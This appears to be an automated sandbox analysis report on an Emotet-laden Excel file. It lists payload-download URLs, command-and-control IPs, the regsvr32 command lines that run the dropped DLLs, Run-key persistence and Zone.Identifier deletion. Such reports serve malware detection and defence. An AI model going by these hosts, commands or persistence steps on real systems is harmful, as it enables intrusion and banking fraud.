Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56

Source: unknown

DNS traffic detected: queries for: datie-tw.com

Source: global traffic	HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown

Office process drops PE file

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx	Jump to dropped file

Source: PO0000001552.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\XEzXl\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07DBCC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C420
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06EAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06732C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0719D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C0E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07D118
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06EFA4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C7C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06D720
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B074574
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B065D68
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0715B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B073CE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_009B0000
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001864
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008470
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800274F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180012108
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180027AE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007F20
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019F38
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000EB3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FBB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001FE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800197F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180012BFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001EBFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008BFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003800
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007014
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015020
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002A43C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E850
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180002C5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013468
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A470
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180016C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014C80
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B888
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011C90
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021894
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021094
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005498
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180017CB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025CB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800094BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800180C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001B4CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800278D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003CD8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001E8E4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800258E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800138F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180002504
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001C108
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E50C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014514
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180026518
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015120
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015524
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007130
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008D40
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002C144
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000795C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001560
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001C57C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E97C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003990
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800099A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800299A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B9B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013DBC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001FDC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800131C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000D1CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800029CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B5CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800245D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800191E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FDE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A9F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800055F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000320C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011A19
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001F624
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013634
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BA34
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002BA3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015240
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180017A40
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007658
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FA60
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025668
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180006668
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008E68
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001B670
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BE70
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000A678
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A27C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025280
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005684
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CE88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002228C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001428C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180018698
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180023E9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800016A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800072A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000D6A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002B6AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800026B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CAB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000BAD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001EEE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025B0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021B10
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003310
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E310
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180027F1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001FF28
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011F30
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010330
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015344
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003F54
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180006B54
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180029F58
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A764
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013B6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001337C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180009B84
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180024788
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001F388
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019B88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C788
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001238C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180023B90
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BB98
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002B39C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B3A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010BAE
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800293B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800167C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000AFD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000BBD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800137DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000ABDC

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll

Source: PO0000001552.xls

Virustotal: Detection: 66%

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: PO0000001552.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\PO0000001552.xls

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{8FCFB94A-FCE6-4E34-A02C-69E8EC3E944A} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@11/15@4/59

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B0638E8 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,ShowWindow,UpdateWindow,

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: PO0000001552.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00000001800274F4 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source: PO0000001552.xls

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005098 push ebp; ret
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800118AD push esp; retn 0000h
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800170C8 push eax; retf
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800170DD push ecx; iretd
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000512B push ebp; retf
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180004938 push eax; ret
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800171F0 push eax; retf
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010F42 push 8B48E1F7h; retf
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800117D6 pushad ; ret

Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr	Static PE information: section name: text
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr	Static PE information: section name: text
Source: elv2.ooocccxxx.0.dr	Static PE information: section name: text
Source: elv3.ooocccxxx.0.dr	Static PE information: section name: text

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,

Source: elv2.ooocccxxx.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: elv3.ooocccxxx.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x72327

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx	Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)			Jump to dropped file

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\regsvr32.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll			Jump to behavior

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\XEzXl\JZazaZgAOY.dll:Zone.Identifier read attributes \| delete
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
